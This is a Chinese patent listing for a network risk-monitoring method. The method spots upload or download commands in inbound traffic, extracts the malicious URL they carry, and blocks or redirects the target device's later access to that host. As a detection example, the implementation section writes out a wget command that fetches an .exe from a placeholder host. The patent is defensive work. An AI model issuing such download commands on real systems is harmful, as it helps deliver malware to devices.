CN111212070B - 风险监控方法、装置、计算设备以及介质 - Google Patents
风险监控方法、装置、计算设备以及介质 Download PDFInfo
- Publication number
- CN111212070B CN111212070B CN201911424081.7A CN201911424081A CN111212070B CN 111212070 B CN111212070 B CN 111212070B CN 201911424081 A CN201911424081 A CN 201911424081A CN 111212070 B CN111212070 B CN 111212070B
- Authority
- CN
- China
- Prior art keywords
- information
- target
- data stream
- access data
- address information
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Active
Links
Images
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/10—Network architectures or network communication protocols for network security for controlling access to devices or network resources
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/10—Network architectures or network communication protocols for network security for controlling access to devices or network resources
- H04L63/101—Access control lists [ACL]
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1441—Countermeasures against malicious traffic
- H04L63/145—Countermeasures against malicious traffic the attack involving the propagation of malware through the network, e.g. viruses, trojans or worms
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- Computer Hardware Design (AREA)
- Computing Systems (AREA)
- General Engineering & Computer Science (AREA)
- Computer Networks & Wireless Communication (AREA)
- Signal Processing (AREA)
- Health & Medical Sciences (AREA)
- General Health & Medical Sciences (AREA)
- Virology (AREA)
- Data Exchanges In Wide-Area Networks (AREA)
Abstract
本公开提供一种风险监控方法,包括:获取目标设备的第一访问数据流,其中,第一访问数据流包括第一设备访问目标设备生成的数据流,确定第一访问数据流中是否包括风险信息,其中,风险信息与目标地址信息相关联,目标地址信息包括第二设备的地址信息,响应于确定第一访问数据流包括风险信息,获取目标地址信息,基于目标地址信息,禁止目标设备访问第二设备。本公开还提供了一种风险监控装置、一种计算设备以及一种计算机可读存储介质。
Description
技术领域
本公开涉及计算机技术领域,更具体地,涉及一种风险监控方法、一种风险监控装置、一种计算设备以及一种计算机可读存储介质。
背景技术
随着计算机技术的发展,网络中的各个设备之间可以进行数据交互,例如各个设备之间可以相互访问。但是,网络中的各个设备之中可能存在攻击者,该攻击者通过传播恶意内容,使得网络中的其他设备感染恶意内容,从而实现攻击的目的。因此,如何对恶意内容进行防御,以降低损失成为亟需解决的问题。
发明内容
有鉴于此,本公开提供了一种优化的风险监控方法、风险监控装置、计算设备和计算机可读存储介质。
本公开的一个方面提供了一种风险监控方法,包括:获取目标设备的第一访问数据流,其中,所述第一访问数据流包括第一设备访问所述目标设备生成的数据流,确定所述第一访问数据流中是否包括风险信息,其中,所述风险信息与目标地址信息相关联,所述目标地址信息包括第二设备的地址信息,响应于确定所述第一访问数据流包括所述风险信息,获取所述目标地址信息,基于所述目标地址信息,禁止所述目标设备访问所述第二设备。
根据本公开实施例,上述方法还包括:获取预置敏感命令,所述预置敏感命令包括数据上传命令和数据下载命令中的至少一个。其中,所述确定所述第一访问数据流中是否包括风险信息,包括:确定所述第一访问数据流中是否包括预置敏感命令,响应于确定所述第一访问数据流中包括所述预置敏感命令,确定所述第一访问数据流中是否包括所述风险信息。
根据本公开实施例,上述方法还包括:获取与所述预置敏感命令相匹配的提取规则。其中,所述获取所述目标地址信息包括:基于所述提取规则,提取所述第一访问数据流中的所述风险信息,基于所述风险信息获取所述目标地址信息。
根据本公开实施例,上述提取规则包括所要提取的信息的信息类型和提取方式。其中,所述基于所述提取规则,提取所述第一访问数据流中的所述风险信息包括:确定所述第一访问数据流中符合所述信息类型的风险信息,基于所述提取方式,提取符合所述信息类型的风险信息。
根据本公开实施例,上述提取方式包括参考信息和相对目标位置。其中,所述基于所述提取方式,提取符合所述信息类型的风险信息包括:确定所述第一访问数据流中的参考信息,提取与所述参考信息处于所述相对目标位置的信息作为所述风险信息。
根据本公开实施例,上述风险信息包括第一链接信息。其中,所述基于所述风险信息获取所述目标地址信息包括:确定所述第一链接信息所指向的第一目标数据,确定存储所述第一目标数据的设备作为所述第二设备,获取所述第二设备的所述目标地址信息,其中,所述目标地址信息包括域名和IP地址中的至少一个。
根据本公开实施例,上述方法还包括:获取所述目标设备的第二访问数据流,其中,所述第二访问数据流包括所述目标设备访问所述第二设备生成的数据流。其中,所述基于所述目标地址信息,禁止所述目标设备访问所述第二设备包括:确定所述第二访问数据流中是否包括所述目标地址信息,响应于确定所述第二访问数据流中包括所述目标地址信息,禁止所述目标设备访问所述第二设备。
根据本公开实施例,上述基于所述目标地址信息,禁止所述目标设备访问所述第二设备包括:阻断所述目标设备访问所述目标地址信息。
根据本公开实施例,在所述基于所述目标地址信息,禁止所述目标设备访问所述第二设备之后,所述方法还包括:获取合法地址信息,基于所述合法地址信息更新所述目标地址信息,以便于所述目标设备访问更新后的目标地址信息。
根据本公开实施例,在所述基于所述目标地址信息,禁止所述目标设备访问所述第二设备之后,所述方法还包括:获取所述目标设备所要访问的第二链接信息,所述第二链接信息指向第二目标数据,所述第二目标数据存储于所述第二设备,获取合法链接信息,基于所述合法链接信息更新所述第二链接信息,以便于所述目标设备访问更新后的第二链接信息。
本公开的另一个方面提供了一种风险监控装置,包括:第一获取模块、确定模块、第二获取模块以及禁止模块。其中,第一获取模块,获取目标设备的第一访问数据流,其中,所述第一访问数据流包括第一设备访问所述目标设备生成的数据流。确定模块,确定所述第一防问数据流中是否包括风险信息,其中,所述风险信息与目标地址信息相关联,所述目标地址信息包括第二设备的地址信息。第二获取模块,响应于确定所述第一访问数据流中包括所述风险信息,获取所述目标地址信息。禁止模块,基于所述目标地址信息,禁止所述目标设备访问所述第二设备。
根据本公开实施例,上述装置还包括:第四获取模块,获取预置敏感命令,所述预置敏感命令包括数据上传命令和数据下载命令中的至少一个。其中,所述确定所述第一访问数据流中是否包括风险信息,包括:确定所述第一访问数据流中是否包括预置敏感命令,响应于确定所述第一访问数据流中包括所述预置敏感命令,确定所述第一访问数据流中是否包括所述风险信息。
根据本公开实施例,上述装置还包括:第五获取模块,获取与所述预置敏感命令相匹配的提取规则。其中,所述获取所述目标地址信息包括:基于所述提取规则,提取所述第一访问数据流中的所述风险信息,基于所述风险信息获取所述目标地址信息。
根据本公开实施例,上述提取规则包括所要提取的信息的信息类型和提取方式。其中,所述基于所述提取规则,提取所述第一访问数据流中的所述风险信息包括:确定所述第一访问数据流中符合所述信息类型的风险信息,基于所述提取方式,提取符合所述信息类型的风险信息。
根据本公开实施例,上述提取方式包括参考信息和相对目标位置。其中,所述基于所述提取方式,提取符合所述信息类型的风险信息包括:确定所述第一访问数据流中的参考信息,提取与所述参考信息处于所述相对目标位置的信息作为所述风险信息。
根据本公开实施例,上述风险信息包括第一链接信息。其中,所述基于所述风险信息获取所述目标地址信息包括:确定所述第一链接信息所指向的第一目标数据,确定存储所述第一目标数据的设备作为所述第二设备,获取所述第二设备的所述目标地址信息,其中,所述目标地址信息包括域名和IP地址中的至少一个。
根据本公开实施例,上述装置还包括:第三获取模块,获取所述目标设备的第二访问数据流,其中,所述第二访问数据流包括所述目标设备访问所述第二设备生成的数据流。其中,所述禁止模块包括:确定子模块以及禁止子模块。其中,确定子模块,确定所述第二访问数据流中是否包括所述目标地址信息。禁止子模块,响应于确定所述第二访问数据流中包括所述目标地址信息,禁止所述目标设备访问所述第二设备。
根据本公开实施例,上述基于所述目标地址信息,禁止所述目标设备访问所述第二设备包括:阻断所述目标设备访问所述目标地址信息。
根据本公开实施例,上述装置还包括:第六获取模块以及第一更新模块。其中,第六获取模块,获取合法地址信息。第一更新模块,基于所述合法地址信息更新所述目标地址信息,以便于所述目标设备访问更新后的目标地址信息。
根据本公开实施例,上述装置还包括:第七获取模块、第八获取模块以及第二更新模块。其中,第七获取模块,获取所述目标设备所要访问的第二链接信息,所述第二链接信息指向第二目标数据,所述第二目标数据存储于所述第二设备。第八获取模块,获取合法链接信息。第二更新模块,基于所述合法链接信息更新所述第二链接信息,以便于所述目标设备访问更新后的第二链接信息。
本公开的另一方面提供了一种计算机可读存储介质,存储有计算机可执行指令,所述指令在被执行时用于实现如上所述的方法。
本公开的另一方面提供了一种计算机程序,所述计算机程序包括计算机可执行指令,所述指令在被执行时用于实现如上所述的方法。
根据本公开的实施例,可以至少部分地解决相关技术中网络中攻击者通过传播恶意内容,使得网络中的其他设备感染恶意内容的问题,并因此可以实现对恶意内容进行防御,以降低损失的技术效果。
附图说明
通过以下参照附图对本公开实施例的描述,本公开的上述以及其他目的、特征和优点将更为清楚,在附图中:
图1示意性示出了根据本公开实施例的风险监控方法和风险监控装置的应用场景;
图2示意性示出了根据本公开实施例的风险监控方法的流程图;
图3示意性示出了根据本公开另一实施例的风险监控方法的流程图;
图4示意性示出了根据本公开实施例的风险监控装置的框图;
图5示意性示出了根据本公开另一实施例的风险监控装置的框图;以及
图6示意性示出了根据本公开实施例的适于风险监控的计算机系统的方框图。
具体实施方式
以下,将参照附图来描述本公开的实施例。但是应该理解,这些描述只是示例性的,而并非要限制本公开的范围。在下面的详细描述中,为便于解释,阐述了许多具体的细节以提供对本公开实施例的全面理解。然而,明显地,一个或多个实施例在没有这些具体细节的情况下也可以被实施。此外,在以下说明中,省略了对公知结构和技术的描述,以避免不必要地混淆本公开的概念。
在此使用的术语仅仅是为了描述具体实施例,而并非意在限制本公开。在此使用的术语“包括”、“包含”等表明了所述特征、步骤、操作和/或部件的存在,但是并不排除存在或添加一个或多个其他特征、步骤、操作或部件。
在此使用的所有术语(包括技术和科学术语)具有本领域技术人员通常所理解的含义,除非另外定义。应注意,这里使用的术语应解释为具有与本说明书的上下文相一致的含义,而不应以理想化或过于刻板的方式来解释。
在使用类似于“A、B和C等中至少一个”这样的表述的情况下,一般来说应该按照本领域技术人员通常理解该表述的含义来予以解释(例如,“具有A、B和C中至少一个的系统”应包括但不限于单独具有A、单独具有B、单独具有C、具有A和B、具有A和C、具有B和C、和/或具有A、B、C的系统等)。在使用类似于“A、B或C等中至少一个”这样的表述的情况下,一般来说应该按照本领域技术人员通常理解该表述的含义来予以解释(例如,“具有A、B或C中至少一个的系统”应包括但不限于单独具有A、单独具有B、单独具有C、具有A和B、具有A和C、具有B和C、和/或具有A、B、C的系统等)。
本公开的实施例提供了一种风险监控方法,包括:获取目标设备的第一访问数据流,其中,第一访问数据流包括第一设备访问目标设备生成的数据流。然后,可以确定第一访问数据流中是否包括风险信息,其中,风险信息与目标地址信息相关联,目标地址信息包括第二设备的地址信息。其后,可以响应于确定第一访问数据流包括风险信息,获取目标地址信息,并基于目标地址信息,禁止目标设备访问第二设备。
图1示意性示出了根据本公开实施例的风险监控方法和风险监控装置的应有场景。需要注意的是,图1所示仅为可以应用本公开实施例的应有场景的示例,以帮助本领域技术人员理解本公开的技术内容,但并不意味着本公开实施例不可以用于其他设备、系统、环境或场景。
如图1所示,该应用场景100例如包括目标设备110、第一设备120以及第二设备130。
根据本公开实施例,第一设备120例如可以是攻击者,第二设备130例如可以是提供恶意内容的设备。其中,第一设备120可以是客户端,第二设备130可以是服务器端。
其中,第一设备120可以攻击目标设备110。例如,第一设备120将风险信息发送给目标设备110。目标设备110可以通过风险信息访问第二设备130,并获取第二设备130中的恶意内容,从而使得第一设备120成功攻击目标设备110。
因此,本公开实施例可以通过获取第一设备120发送给目标设备110的风险信息,并基于风险信息确定第二设备130的目标地址信息。并禁止该目标设备110访问该目标地址信息,从而达到防御的目的,降低目标设备110的损失。
图2示意性示出了根据本公开实施例的风险监控方法的流程图。
如图2所示,该方法包括操作S210~S240。
在操作S210,获取目标设备的第一访问数据流,其中,第一访问数据流包括第一设备访问目标设备生成的数据流。
本公开实施例中的目标设备、第一设备以及第二设备可以与图1所示实施中的设备相同或类似。第一访问数据流例如可是第一设备访问目标设备生成的流量数据。
在操作S220,确定第一访问数据流中是否包括风险信息,其中,风险信息与目标地址信息相关联,目标地址信息包括第二设备的地址信息。
根据本公开实施例,风险信息与目标地址信息相关联例如可以表示第一访问数据流中具有第二设备的第一链接信息,第一链接信息例如包括URL链接信息。其中,第一设备向目标设备发送第一链接信息,以便目标设备通过第一链接信息访问第二设备的中存储的数据。如果第一访问数据流中包括风险信息,则表示第一设备例如为攻击者,第二设备例如为提供恶意内容的设备。第一设备将访问第二设备的第一链接信息发送给目标设备,以便于目标设备通过第一链接信息访问第二设备时感染第二设备中的恶意内容。
在操作S230,响应于确定第一访问数据流包括风险信息,获取目标地址信息。
在本公开实施例中,如果第一访问数据流中包括风险信息,则可以基于风险信息获取关于第二设备的目标地址信息,并存储该目标地址信息,便于后续的安全防御。
在操作S240,基于目标地址信息,禁止目标设备访问第二设备。例如,如果发现目标设备访问目标地址信息,则可以禁止目标设备继续访问目标地址信息,以防止目标设备感染第二设备中的恶意内容。具体地,禁止目标设备继续访问目标地址信息可以包括阻断目标设备访问目标地址信息。
本公开实施例通过从第一设备发送给目标设备的上行流量中确定风险信息,并基于该风险信息确定目标设备与第二设备之间的下行流量是否为恶意访问。如果目标设备所访问的第二设备为存在恶意内容的设备,则本公共实施例可以禁止目标设备访问第二设备,从而实现了防御的目的,降低了目标设备的损失。
图3示意性示出了根据本公开另一实施例的风险监控方法的流程图。
如图3所示,该方法例如包括包括操作S210~S240以及操作S310。其中,操作S210~S240与图2中的操作相同或类似,在此不再赘述。其中,操作S240例如可以包括操作S241~S242。
在操作S310,获取目标设备的第二访问数据流,其中,第二访问数据流包括目标设备访问第二设备生成的数据流。
例如,在确定第一访问数据流(上行流量)中包括风险信息之后,可以获取第二访问数据流(下行流量),并基于目标地址信息监控所获取的第二访问数据流,以便于确定第二访问数据流中是否具有目标地址信息。
根据本公开实施例,基于目标地址信息,禁止目标设备访问第二设备包括如下操作S241~S242。
在操作S241,确定第二访问数据流中是否包括目标地址信息。
在操作S242,响应于确定第二访问数据流中包括目标地址信息,禁止目标设备访问第二设备。
根据本公开实施例,如果第二访问数据流中具有目标地址信息,可以表示目标设备正在访问第二设备。由于第二设备为提供恶意内容的设备,因此,为了避免目标设备感染恶意内容,可以禁止目标设备访问第二设备,例如,可以阻断目标设备将第二访问数据流传向第二设备。
本公开实施例的技术方案通过从第二访问数据流中确定是否具有第二设备的目标地址信息,并在确定第二访问数据流中具有第二设备的目标地址信息时,禁止目标设备访问第二设备,实现了提前避免目标设备感染第二设备的恶意内容的效果。
根据本公开实施例,在确定第一访问数据流中是否包括风险信息之前,例如可以首先获取预置敏感命令。其中,预置敏感命令例如包括数据上传命令或者数据下载命令。其中,该预置敏感命令例如存储于线索库中,当系统启动时,可以加载线索库以获得预置敏感命令。
在获取预置敏感命令之后,可以确定第一访问数据流中是否包括预置敏感命令。如果第一访问数据流中包括预置敏感命令,则可以继续确定第一访问数据流中是否包括风险信息。
换言之,第一设备与目标设备之间可以进行数据交换。在数据交换过程中,如果第一设备与目标设备之间的交换命令中具有预置敏感命令,则可以确定第一设备可能向目标设备发送风险信息(目标地址信息)。例如,如果预置敏感命令中包括目标设备将相关数据上传至第一设备时所生产的数据上传命令,则表示第一设备可能在数据上传过程中向目标设备发送风险信息。如果预置敏感命令中包括目标设备从第一设备中下载相关数据时所产生的数据下载命令,则表示第一设备提供给目标设备下载的相关数据中可能存在风险信息。在本公开实施例中,如果因此第一访问数据流中包括预置敏感命令,则表示第一访问数据流中具有风险信息的概率较大。因此,本公开实施例首先确定第一访问数据流中是否包括预置敏感命令,以便在确定第一访问数据流中包括预置敏感命令时进一步确定第一访问数据流中是否包括风险信息,实现了风险监控的准确性。
根据本公开实施例,如果确定第一访问数据流中具有风险信息,则可以获取与预置敏感命令相匹配的提取规则,以便于根据提取规则从第一访问数据流中提取风险信息。具体地,可以基于提取规则,提取第一访问数据流中的风险信息,并基于风险信息获取目标地址信息。即,通过提取规则能够实现自动提取风险信息的效果,提高了风险防控的效率。
根据本公开实施例,提取规则例如包括所要提取的信息的信息类型和提取方式。例如,可以确定第一访问数据流中符合信息类型的风险信息,并基于提取方式提取符合信息类型的风险信息。其中,本公开实施例基于信息类型和提取方式来实现自动提取风险信息,以信息类型和提取方式为依据来提取风险信息,实现所提取的风险信息较为准确。
例如,信息类型例如包括URL信息类型。其中,提取方式包括参考信息和相对目标位置,相对目标位置例如为所要提取的风险信息与参考信息之间的相对位置信息。
具体地,基于提取方式提取风险信息的实现方式可以包括:确定第一访问数据流中的参考信息,提取与参考信息处于相对目标位置的信息作为风险信息。其中,本公开实施例基于参考信息来提取风险信息,能够实现以精准定位风险信息,使得所提取的风险信息较为准确。
例如,以第一访问数据流包括“wget-c-o xxx.exe http://x.x.x/abc.com”举例。参考信息例如可以是“-o”,相对目标位置例如可以是参考信息之后的第一个满足信息类型的参数。信息类型例如包括URL信息类型。因此,所提取到的参考信息“-o”之后的第一个URL信息类型的参数例如为“http://x.x.x/abc.com”。此时,可以将所提取到的“http://x.x.x/abc.com”作为风险信息。可以理解,本公开实施例不限制参考信息的具体类型,参考信息例如还可以包括“-object”等等,本领域技术人员可以根据实际应用情况具体设定参考信息的具体类型。
根据本公实施例,风险信息例如包括第一链接信息。该第一链接信息例如可以包括URL链接信息。其中,该第一链接信息例如指向第一目标数据。换言之,目标设备可以通过访问URL链接信息“http://x.x.x/abc.com”获取存储在第二设备中的第一目标数据。该第一目标数据例如可以是视频数据、图像数据等等各种类型的数据。
根据本公开实施例,可以确定存储第一目标数据的设备作为第二设备。然后,可以通过解析URL链接信息得到该链接信息所指向的第二设备的目标地址信息。其中,目标地址信息可以包括第二设备的域名或IP地址。可以理解,目标设备可以通过访问URL链接信息所对应的第二设备的域名或IP地址来获取第一目标数据。根据本公开实施例,由于第二设备所提供的第一目标数据可能为恶意内容,因此,本公开实施例通过获取目标地址信息,并在目标设备要访问目标地址信息时阻断目标设备向第二设备发送第二访问数据流,即,禁止目标设备将第二访问数据流传送给第二设备,防止目标设备受到感染。
根据本公开实施例,例如可以在系统启动时加载线索库。在加载线索库后可以读取线索库中的预置敏感命令和提取规则,并可以产生扫描规则。其中,每种预置敏感命令例如对应有相应的提取规则,所产生的每个扫描规则例如具有对应的规则ID,每个扫描规则中例如包括所要提取的信息的信息类型和提取方式。然后,可以利用多个扫描规则扫描第一访问数据流,在确定第一访问数据流中包括预置敏感命令后,可以确定与预置敏感命令对应的规则ID,并基于所确定规则ID对应的扫描规则,利用扫描规则中包括的所要提取的信息的信息类型和提取方式进一步提取第一访问数据流中的风险信息。
根据本公开实施例,当提取到风险信息并基于风险信息分析得到目标地址信息后,可以将目标地址信息存储至观察列表中。后续可以基于观察列表监控第二访问数据流,便于在第二访问数据流中具有目标地址信息时,禁止目标设备访问目标地址信息对应的第二设备。其中,在基于目标地址信息,禁止目标设备访问第二设备之后,本公开实施例例如还包括控制目标设备访问其他链接。其中,控制目标设备访问其他链接例如包括多种方式,本公开实施例例如以两种方式举例。
第一种方式,例如采用阻断的方式禁止目标设备访问第二设备。例如,如果监控到第二防问数据流中包括观察列表中的IP地址,则可以采取阻断方式阻断目标设备对此IP地址的访问。即,一旦监控到目标设备访问此IP地址的报文,即发送reset报文给目标设备,使得目标设备不再继续访问此恶意IP地址。
第二种方式,例如可以采用重定向的方式禁止目标设备访问第二设备。即,将目标设备访问第二设备的路径重定向为目标设备访问其他设备。
例如,可以通过获取合法地址信息,并基于合法地址信息更新目标地址信息,以便于目标设备访问更新后的目标地址信息。即,将第二访问数据流中的目标地址信息更新为合法地址信息,并允许目标设备继续访问更新后的目标地址信息,此时,目标设备所访问的更新后的目标地址信息不再是提供恶意内容的第二设备的地址信息。
或者,例如获取目标设备所要访问的第二链接信息,该第二链接信息例如指向第二目标数据,第二目标数据例如为存储于第二设备中的恶意内容。其中,第二链接信息例如可以是URL链接信息。然后,获取合法链接信息,合法连接信息例如为合法的URL链接信息,并基于合法链接信息更新第二链接信息,以便于目标设备访问更新后的第二链接信息。此时,目标设备所访问的更新后的第二链接信息不再指向恶意内容。例如,如果监控到第二访问数据流中包括观察列表中的IP地址或域名,如果后续出现目标设备通过URL链接信息对此IP地址或域名进行的HTTP访问,则可以采用URL重定向的方式更新URL链接信息,并基于更新后的URL链接信息重新进行HTTP访问,以达到防御的目的。
可以理解,本公开实施例通过重定向的方式,阻断目标设备访问恶意内容,实现防御的目的,使得目标设备所访问的内容为非恶意内容。通过本公开试实施例能够至少保证目标设备的安全,防止目标设备被第二设备中的恶意内容感染,降低目标设备的损失。
可以理解,本公开实施例的第一访问数据流和第二访问数据流例如可以流量数据。流量数据例如可以是基于相关协议传输的数据。其中,相关协议例如可以包括http、smtp、ftp、pop3、imap、smb、telnet、tftp、sctp、nfs等等。
图4示意性示出了根据本公开实施例的风险监控装置的框图。
如图4所示,风险监控装置400例如包括第一获取模块410、确定模块420、第二获取模块430以及禁止模块440。
第一获取模块410可以用于获取目标设备的第一访问数据流,其中,第一访问数据流包括第一设备访问目标设备生成的数据流。根据本公开实施例,第一获取模块410例如可以执行上文参考图2描述的操作S210,在此不再赘述。
确定模块420可以用于确定第一访问数据流中是否包括风险信息,其中,风险信息与目标地址信息相关联,目标地址信息包括第二设备的地址信息。根据本公开实施例,确定模块420例如可以执行上文参考图2描述的操作S220,在此不再赘述。
第二获取模块430可以用于响应于确定第一访问数据流包括风险信息,获取目标地址信息。根据本公开实施例,第二获取模块430例如可以执行上文参考图2描述的操作S230,在此不再赘述。
禁止模块440可以用于基于目标地址信息,禁止目标设备访问第二设备。根据本公开实施例,禁止模块440例如可以执行上文参考图2描述的操作S240,在此不再赘述。
图5示意性示出了根据本公开另一实施例的风险监控装置的框图。
如图5所示,风险监控装置500例如包括第一获取模块410、确定模块420、第二获取模块430、禁止模块440以及第三获取模块510。其中,第一获取模块410、确定模块420、第二获取模块430以及禁止模块440例如与上参考图4描述的模块相同或类似,在此不再赘述。其中,禁止模块440例如包括确定子模块441以及禁止子模块442。
第三获取模块510可以用于获取目标设备的第二访问数据流,其中,第二访问数据流包括目标设备访问第二设备生成的数据流。根据本公开实施例,第三获取模块510例如可以执行上文参考图3描述的操作S310,在此不再赘述。
确定子模块441可以用于确定第二访问数据流中是否包括目标地址信息。根据本公开实施例,确定子模块441例如可以执行上文参考图3描述的操作S241,在此不再赘述。
禁止子模块442可以用于响应于确定第二访问数据流中包括目标地址信息,禁止目标设备访问第二设备。根据本公开实施例,禁止子模块442例如可以执行上文参考图3描述的操作S242,在此不再赘述。
根据本公开实施例,装置400或500例如还包括:第四获取模块,获取预置敏感命令,预置敏感命令包括数据上传命令和数据下载命令中的至少一个。其中,确定第一访问数据流中是否包括风险信息,包括:确定第一访问数据流中是否包括预置敏感命令,响应于确定第一访问数据流中包括预置敏感命令,确定第一访问数据流中是否包括风险信息。
根据本公开实施例,装置400或500例如还包括:第五获取模块,获取与预置敏感命令相匹配的提取规则。其中,获取目标地址信息包括:基于提取规则,提取第一访问数据流中的风险信息,基于风险信息获取目标地址信息。
根据本公开实施例,提取规则包括所要提取的信息的信息类型和提取方式。其中,基于提取规则,提取第一访问数据流中的风险信息包括:确定第一访问数据流中符合信息类型的风险信息,基于提取方式,提取符合信息类型的风险信息。
根据本公开实施例,提取方式包括参考信息和相对目标位置。其中,基于提取方式,提取符合信息类型的风险信息包括:确定第一访问数据流中的参考信息,提取与参考信息处于相对目标位置的信息作为风险信息。
根据本公开实施例,风险信息包括第一链接信息。其中,基于风险信息获取目标地址信息包括:确定第一链接信息所指向的第一目标数据,确定存储第一目标数据的设备作为第二设备,获取第二设备的目标地址信息,其中,目标地址信息包括域名和IP地址中的至少一个。
根据本公开实施例,基于目标地址信息,禁止目标设备访问第二设备包括:阻断目标设备访问目标地址信息。
根据本公开实施例,装置400或500例如还包括:第六获取模块以及第一更新模块。其中,第六获取模块,获取合法地址信息。第一更新模块,基于合法地址信息更新目标地址信息,以便于目标设备访问更新后的目标地址信息。
根据本公开实施例,装置400或500例如还包括:第七获取模块、第八获取模块以及第二更新模块。其中,第七获取模块,获取目标设备所要访问的第二链接信息,第二链接信息指向第二目标数据,第二目标数据存储于第二设备。第八获取模块,获取合法链接信息。第二更新模块,基于合法链接信息更新第二链接信息,以便于目标设备访问更新后的第二链接信息。
根据本公开的实施例的模块、子模块、单元、子单元中的任意多个、或其中任意多个的至少部分功能可以在一个模块中实现。根据本公开实施例的模块、子模块、单元、子单元中的任意一个或多个可以被拆分成多个模块来实现。根据本公开实施例的模块、子模块、单元、子单元中的任意一个或多个可以至少被部分地实现为硬件电路,例如现场可编程门阵列(FPGA)、可编程逻辑阵列(PLA)、片上系统、基板上的系统、封装上的系统、专用集成电路(ASIC),或可以通过对电路进行集成或封装的任何其他的合理方式的硬件或固件来实现,或以软件、硬件以及固件三种实现方式中任意一种或以其中任意几种的适当组合来实现。或者,根据本公开实施例的模块、子模块、单元、子单元中的一个或多个可以至少被部分地实现为计算机程序模块,当该计算机程序模块被运行时,可以执行相应的功能。
例如,第一获取模块410、确定模块420、第二获取模块430、禁止模块440、确定子模块441、禁止子模块442以及第二获取模块510中的任意多个可以合并在一个模块中实现,或者其中的任意一个模块可以被拆分成多个模块。或者,这些模块中的一个或多个模块的至少部分功能可以与其他模块的至少部分功能相结合,并在一个模块中实现。根据本公开的实施例,第一获取模块410、确定模块420、第二获取模块430、禁止模块440、确定子模块441、禁止子模块442以及第二获取模块510中的至少一个可以至少被部分地实现为硬件电路,例如现场可编程门阵列(FPGA)、可编程逻辑阵列(PLA)、片上系统、基板上的系统、封装上的系统、专用集成电路(ASIC),或可以通过对电路进行集成或封装的任何其他的合理方式等硬件或固件来实现,或以软件、硬件以及固件三种实现方式中任意一种或以其中任意几种的适当组合来实现。或者,第一获取模块410、确定模块420、第二获取模块430、禁止模块440、确定子模块441、禁止子模块442以及第二获取模块510中的至少一个可以至少被部分地实现为计算机程序模块,当该计算机程序模块被运行时,可以执行相应的功能。
图6示意性示出了根据本公开实施例的适于风险监控的计算机系统的方框图。图6示出的计算机系统仅仅是一个示例,不应对本公开实施例的功能和使用范围带来任何限制。
如图6所示,根据本公开实施例的计算机系统600包括处理器601,其可以根据存储在只读存储器(ROM)602中的程序或者从存储部分608加载到随机访问存储器(RAM)603中的程序而执行各种适当的动作和处理。处理器601例如可以包括通用微处理器(例如CPU)、指令集处理器和/或相关芯片组和/或专用微处理器(例如,专用集成电路(ASIC)),等等。处理器601还可以包括用于缓存用途的板载存储器。处理器601可以包括用于执行根据本公开实施例的方法流程的不同动作的单一处理单元或者是多个处理单元。
在RAM 603中,存储有系统600操作所需的各种程序和数据。处理器601、ROM 602以及RAM 603通过总线604彼此相连。处理器601通过执行ROM 602和/或RAM 603中的程序来执行根据本公开实施例的方法流程的各种操作。需要注意,所述程序也可以存储在除ROM 602和RAM 603以外的一个或多个存储器中。处理器601也可以通过执行存储在所述一个或多个存储器中的程序来执行根据本公开实施例的方法流程的各种操作。
根据本公开的实施例,系统600还可以包括输入/输出(I/O)接口605,输入/输出(I/O)接口605也连接至总线604。系统600还可以包括连接至I/O接口605的以下部件中的一项或多项:包括键盘、鼠标等的输入部分606;包括诸如阴极射线管(CRT)、液晶显示器(LCD)等以及扬声器等的输出部分607;包括硬盘等的存储部分608;以及包括诸如LAN卡、调制解调器等的网络接口卡的通信部分609。通信部分609经由诸如因特网的网络执行通信处理。驱动器610也根据需要连接至I/O接口605。可拆卸介质611,诸如磁盘、光盘、磁光盘、半导体存储器等等,根据需要安装在驱动器610上,以便于从其上读出的计算机程序根据需要被安装入存储部分608。
根据本公开的实施例,根据本公开实施例的方法流程可以被实现为计算机软件程序。例如,本公开的实施例包括一种计算机程序产品,其包括承载在计算机可读存储介质上的计算机程序,该计算机程序包含用于执行流程图所示的方法的程序代码。在这样的实施例中,该计算机程序可以通过通信部分609从网络上被下载和安装,和/或从可拆卸介质611被安装。在该计算机程序被处理器601执行时,执行本公开实施例的系统中限定的上述功能。根据本公开的实施例,上文描述的系统、设备、装置、模块、单元等可以通过计算机程序模块来实现。
本公开还提供了一种计算机可读存储介质,该计算机可读存储介质可以是上述实施例中描述的设备/装置/系统中所包含的;也可以是单独存在,而未装配入该设备/装置/系统中。上述计算机可读存储介质承载有一个或者多个程序,当上述一个或者多个程序被执行时,实现根据本公开实施例的方法。
根据本公开的实施例,计算机可读存储介质可以是计算机非易失性的计算机可读存储介质,例如可以可以包括但不限于:便携式计算机磁盘、硬盘、随机访问存储器(RAM)、只读存储器(ROM)、可擦式可编程只读存储器(EPROM或闪存)、便携式紧凑磁盘只读存储器(CD-ROM)、光存储器件、磁存储器件、或者上述的任意合适的组合。在本公开中,计算机可读存储介质可以是任何包含或存储程序的有形介质,该程序可以被指令执行系统、装置或者器件使用或者与其结合使用。
例如,根据本公开的实施例,计算机可读存储介质可以包括上文描述的ROM 602和/或RAM 603和/或ROM 602和RAM 603以外的一个或多个存储器。
